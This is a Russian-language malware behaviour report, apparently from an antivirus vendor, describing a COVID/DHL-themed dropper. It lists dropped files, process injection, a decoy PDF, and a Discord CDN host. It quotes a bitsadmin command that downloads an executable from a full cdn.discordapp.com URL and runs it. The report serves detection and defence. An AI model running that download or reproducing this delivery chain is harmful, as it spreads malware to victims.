Техническая информация
Вредоносные функции
Внедряет код в
следующие пользовательские процессы:
- receipt_pdf.exe
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\covid.bat
- %APPDATA%\covid.vbs
- %APPDATA%\dhl.pdf
- %TEMP%\bit3d9c.tmp
- %TEMP%\c40izvecuinalj
- %TEMP%\mjofvzkqrp.dll
Присваивает атрибут 'скрытый' для следующих файлов
- %TEMP%\bit3d9c.tmp
Перемещает следующие файлы
- %TEMP%\bit3d9c.tmp в %TEMP%\receipt_pdf.exe
Сетевая активность
Подключается к
- 'cd#.##scordapp.com':443
TCP
Другие
- 'cd#.##scordapp.com':443
UDP
- DNS ASK cd#.##scordapp.com
Другое
Ищет следующие окна
- ClassName: 'EDIT' WindowName: ''
Создает и запускает на исполнение
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\covid.vbs"
- '%TEMP%\receipt_pdf.exe'
- '%WINDIR%\syswow64\cmd.exe' /c ""%APPDATA%\covid.bat" "' (со скрытым окном)
Запускает на исполнение
- '%ProgramFiles(x86)%\adobe\acrobat reader dc\reader\acrord32.exe' "%APPDATA%\DHL.pdf"
- '%WINDIR%\syswow64\cmd.exe' /c ""%APPDATA%\covid.bat" "
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer covid https://cdn.discordapp.com/attachments/842158048058540076/862582631030587403/RECEIPT_pdf.exe %TEMP%\RECEIPT_pdf.exe
